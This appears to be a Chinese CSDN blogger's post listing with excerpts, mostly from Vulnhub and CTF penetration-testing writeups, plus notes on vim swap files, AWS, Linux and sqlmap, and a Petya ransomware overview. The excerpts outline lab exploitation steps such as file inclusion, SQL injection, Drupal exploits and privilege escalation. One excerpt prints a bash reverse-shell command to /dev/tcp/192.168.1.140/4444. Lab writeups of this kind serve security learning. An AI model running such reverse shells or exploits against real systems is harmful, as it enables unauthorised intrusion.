- 博客(47)
- 资源 (2)
- 收藏
- 关注
原创 vim缓存-交换文件
在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容
2023-09-20 09:15:07
1152
原创 【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup
【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup
2023-09-01 11:10:52
1146
原创 Vulnhub靶机PWNLAB:INIT writeup
Vulnhub靶机PWNLAB:INIT writeup在index页面也找到了对应的源码,并且有两个文件包含漏洞另一个是cookie包含文件,也是可以利用成功的在login源码看到有config.php在config.php源码当中发现了数据库的用户名密码之前扫描端口的时候发现开发了3306,使用mysql远程连接查看登录页面的用户名密码使用获取的用户名密码登录,密码需要使用base64解密登录成功,发现上传页面但不允许上传php文件返回文
2022-12-04 10:00:40
364
原创 BUUCTF MISC [WUSTCTF2020]爬
winhex打开查看文件头发现是PDF更改后缀打开,提示flag被图片挡住了删除图片后发现一串十六进制数(如果不能编辑PDF,可将PDF转换成WORD操作)将十六进驻数提取出来,转换成字符串最后得到wctf2020{th1s_1s_@pdf_and_y0u_can_use_phot0sh0p}提交flag需要将wctf2020改成flag:**flag{th1s_1s@_pdf_and_y0u_can_use_phot0sh0p}**...
2022-04-23 21:49:35
598
原创 VulnHub靶机MILNET:1writeup
VulnHub靶机MILNET:1writeup信息收集获取IP地址扫描端口80端口(没有发现有用信息)列举目录只有一个info.php,访问之后发现允许文件包含和网站根目录的路径经过测试可以通过base64形式执行远程命令注入getshell上传大马msf联动拿shell提权查看用户查看计划任务(这里看到每过一分钟会以root权限执行一次/backup/back..
2022-03-22 08:56:58
524
转载 AWS云计算基础习题(含答案)
模块1:相比本地计算,云计算的优势哪些? 避免大额购买;使用按需容量;数分钟内实现全球化部署;提高速度和敏捷性 。哪种定价模型可使 AWS 用户能够按需为资源付费?按实际使用量付费哪项不是云部署模型? 系统管理即服务 。云部署模型:平台即服务、基础设施即服务、软件即服务。AWS 拥有并维护各种应用程序服务所需的联网硬件,您可以按需预置和使用。√下面哪项不是云计算强于本地计算的优势? 为服务器的机器搭建、堆栈创建和供电等工作付费 。云计算强于本地计算的优势:提高速度和敏捷性;无需猜测基础设施容量需
2022-03-02 15:44:38
15036
3
原创 Vulnhub靶机Bob_v1.0.1 writeup
下载地址:https://www.vulnhub.com/entry/bob-101,226/信息搜集扫描IP地址扫描端口及端口信息访问80端口并没有发现有用的信息扫描目录看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令getshellbash反弹shellbash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
2022-02-18 22:05:05
3112
原创 Vulnhub靶机 VULNOS: 2 writeup
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/信息搜集获取IP地址扫描端口80端口点击website跳转到/jabc在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/访问/jabcd0cs/在/jabcd0cs/发现CMS的版本,使用searchsploit查询这里看到了pyloadhttp://[host]/ajax_udf.php?q=1&
2022-02-10 11:29:13
3119
原创 Vulnhub靶机 web-developer writeup
下载地址:https://www.vulnhub.com/entry/web-developer-1,288信息搜集扫描IP地址扫描开放的端口80端口发现有wordpress内容管理系统列举目录访问ipdata目录发现有analyze.cap下载下来看一下在180这条数据流中发现了登录信息,用户名:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd成功登录到后台getsh...
2022-01-23 22:36:13
2398
原创 Vulnhub靶机Lampiao:1 writeup
下载地址:https://www.vulnhub.com/entry/lampiao-1,249/信息搜集获取IP地址扫描开放的端口80端口80端口没有任何发现1898端口发现启动了Drupal 7列举目录发现有熟悉的rebots.txt在CHANGELOG.txt文件里面发现了Drupal 的版本是7.54getshell通过Kali中的Searchsploit工具可以确定Drupal 7.5...
2022-01-21 23:04:19
4302
原创 Vulnhub靶机hackme: 1 writeup
下载地址:https://www.vulnhub.com/entry/hackme-1,330/信息搜集获取IP地址扫描端口80端口首页是一个登录页面发现有注册页面,注册一个账号admin:password,并且登录成功登录成功之后的页面,是一个查阅图书的页面尝试使用SQL注入sqlmap -r sqlmap.txt --batchsqlmap.txt里面的内容,通过抓包获取的sqlmap.txtPOST /welcome.php HTTP/1.1Host:
2022-01-14 11:33:49
2357
原创 Vulnhub靶机Funbox:1 writeup
下载地址:https://www.vulnhub.com/entry/funbox-1,518/信息搜集获取IP地址扫描端口这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql21端口登录ftp的时候需要用户名密码,先放着80端口访问80端口发现会跳转到funbox.fritz.box修改hosts为:再次访问80端口这里看到使用了wordpress管理系统可以使用wpscan尝试枚举下用户和插件:wpscan --url ht
2022-01-11 17:38:30
1584
转载 常见Linux命令总结!!
列出目录内容 ls -a:显示所有文件(包括隐藏文件); ls -l:显示详细信息; ls -R:递归显示子目录结构; ls -ld:显示目录和链接信息; ctrl+r:历史记录中所搜命令(输入命令中的任意一个字符); Linux中以.开头的文件是隐藏文件; pwd:显示当前目录查看文件的类型 file:查看文件的类型复制文件目录1、cp:复制文件和目录 cp源文件(文件夹)目标文件(文件夹)常用参数:-r:递归复制整个目录树;-v:显示详细信息;复制文件夹时要在cp命令后面加
2021-09-19 19:27:30
112
转载 【工具】sqlmap 中文手册 使用教程
0x01、 基本信息官网https://sqlmap.org/注入类型基于布尔的盲注:即可以根据返回页面判断条件真假的注入;基于时间的盲注:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;基于报错注入:即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;联合查询注入:可以使用union的情况下的注入;堆查询注入:可以同时执行多条语句的执行时的注入。```**支持的数据库**MySQL, Oracle, PostgreSQ
2021-09-18 15:33:10
525
原创 eNSP的下载安装
简单介绍一下 eNSP(来自于百度):eNSP是一款由华为提供的免费的图形化网络仿真工具平台,它将完美呈现真实设备实景(包括华为最新的ARG3路由器和X7系列的交换机),支持大型网络模拟,让你有机会在没有真实设备的情况下也能够实验测试,学习网络技术。NSP(Enterprise Network Simulation Platform)是一款由华为提供的、可扩展的、图形化操作的网络仿真工具平台,主要对企业网络路由器、交换机进行软件仿真,完美呈现真实设备实景,支持大型网络模拟,让广大用户有机会在没有真实设备
2021-09-05 16:30:19
1275
原创 Vulnhub靶机haclabs:deception1.1渗透
靶机介绍官方下载地址:https://www.vulnhub.com/entry/haclabs-deception11,440/靶机有三个flag,第一个flag是下载靶机镜像压缩包的密码,第二个flag在yash用户的家目录里面,第三个flag在root目录下运行环境靶机:网络设为桥接模式,IP地址:192.168.1.114攻击机:同网段下的kali linux,IP地址:192.168.1.115开始渗透获取解压密码将官网提示的字符串使用十六进制解码之后得到密码将靶机运行起来
2021-09-05 00:13:34
823
转载 petya勒索病毒解密方法
Petya是2017年3月出现的一种变体勒索软件,是一种类似于“WannaCry”的新勒索病毒,它的破坏性比传统的勒索软件更大,现已导致俄罗斯石油公司(RosneftPJSC)和丹麦A.P.穆勒-马士基有限公司等在内的多家大型企业被攻击,而且乌克兰的政府系统也遭到了该病毒的袭击。并已确认有国内企业中招。腾讯电脑管家称已确认病毒样本通过永恒之蓝漏洞传播。[1]北京时间2017年6月27日晚,乌克兰、俄罗斯、印度、西班牙、法国、英国以及欧洲多国正在遭遇Petya类勒索病毒袭击,政府、银行、电力系统、通讯系统、
2021-09-03 19:11:31
2037
原创 vulnhub靶机bex渗透
运行环境靶机:网络设为桥接,IP地址为192.168.34.154攻击机:同网段下的kali linux,IP地址为192.168.34.153开始渗透:将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中反弹shell...
2021-03-19 16:53:52
212
原创 Vulnhub靶机Infosec_Warrior1渗透
靶机介绍官方下载地址: http://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/靶机难度:容易运行环境靶机:网络设为NAT模式,IP地址:192.168.174.141攻击机:同网段下的kali linux,IP地址:192.168.174.135开始渗透:运行靶机获取靶机地址扫描端口,只有两个端口22端口是ssh服务的80端口是apache2服务的扫描目录web首页是apache服务的sitemap.xml
2021-03-07 22:16:01
501
原创 Vulnhub靶机vulnuni1.0.1渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/vulnuni-101,439/靶机目标是获取root权限,获取用户的flag,难度是容易运行环境靶机:网络设为NAT模式,IP地址:192.168.174.139攻击机:同网段下的kali linux,IP地址:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口只开放了一个80端口扫描目录爬取网站站点工具使用kali自带的ZAP开始访问获取的站点和目录80端口首页,和
2021-03-07 09:55:45
565
原创 Vulnhub靶机no_name渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/haclabs-no_name,429/靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接运行环境靶机:网络设为桥接,IP地址:192.168.1.91攻击机:同网段下的kali linux,IP地址:192.168.1.37开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开放了一个80端口,扫一下目录开始访问得到的目
2021-03-06 14:54:53
427
原创 Vulnhub靶机m87:1渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/m87-1,595/靶机难度容易,拥有两个用户,网络适配器是NAT模式自动分配IP地址运行环境靶机:网络设为NAT,IP地址:192.168.174.138攻击机:同网段下的kali linux,IP地址:192.168.174.135开始渗透运行靶机靶机运行之后就提示了IP地址,端口和一个域名扫一下端口看是否有其他存在扫一下80端口的目录开始访问得到的这些目录80端口的首页admin
2021-03-06 00:10:46
906
3
原创 VulnHub靶机maskcrafter-1.1渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/maskcrafter-11,445/这个靶机有两种办法获取用户,两种办法获取root,不需要暴力破解运行环境:靶机:网络设为NAT模式,IP地址:192.168.174.136攻击机:同网段下的kali linux,IP地址为:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务这里看到了很多端口一个一个访问先访问21端口的ftp服务将pub目录下的两个文件下载到本
2021-03-04 16:42:24
236
1
原创 Vulnhub靶机CK-00渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/ck-00,444/难度是容易的,建议使用VirtualBox运行靶机运行环境靶机:网络设为桥接,IP地址:192.168.1.90攻击机:同网段下的kali linux,IP地址:192.168.1.37开始渗透将靶机运行起来靶机运行界面就已经告诉了IP地址,接下来就是扫描端口了这里看到22端口是ssh服务,密钥的加密方式是rsa80端口的架构是wordpress使用wpscan对wordpress
2021-03-03 15:08:22
406
原创 Vulnhub靶机recon: 1渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/recon-1,438/这是一个基于wprdpress的漏洞,建议使用VirtualBox运行靶机运行环境靶机:网络设为桥接,IP地址:192.168.1.15攻击机:同网段下的kali linux,IP地址:192.168.1.37开始渗透运行靶机获取靶机IP地址扫描端口使用工具扫描,发现存在很多wprdpress的漏洞使用针对wprdpress的工具扫描 wpscan这里获取了两个用
2021-03-02 18:21:34
360
原创 Vulnhub靶机Reconforce渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/hacknos-reconforce-v11,416/这个靶机有两个flag,难度是中级运行环境靶机:网络设为桥接,IP地址:192.168.1.89攻击机:同网段下的kali linux,IP地址:192.168.1.37开始渗透将靶机运行起来获取靶机IP地址扫描端口及其服务这里获取了21端口是允许ftp登录的 而且是允许Anonymous登录的22端口是ssh服务,密钥加密方式是rsa,80端
2021-03-02 00:29:40
322
原创 vulnhub靶机Acid渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/acid-server,125/这个靶机的目标是获取root目录的的flag,运行环境靶机:网络连接方式设为NAT,IP地址:192.168.174.134攻击机:同网段下的kali Linux系统,IP地址为:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开启了33447端口,是web服务访问33447端口,在源代码中发现了0x643239334c6d7077
2021-02-28 17:10:48
260
原创 Vulnhub靶机zico2渗透
靶机介绍官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/目标是获取root的目录下的flag,难度是中级运行环境:靶机:网络设为NAT模式,IP地址为:192.168.174.133攻击机:同网段下的kali Linux,IP地址为:192.168.174.128运行靶机开始渗透获取IP地址扫描端口访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含使用工具扫描发现确实存在目录遍历的漏洞,并
2021-02-27 22:27:00
412
原创 Vulnhub靶机 TOPHATSEC: FRESHLY writeup
Vulnhub靶机 TOPHATSEC: FRESHLY writeup
2021-02-27 14:13:30
468
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人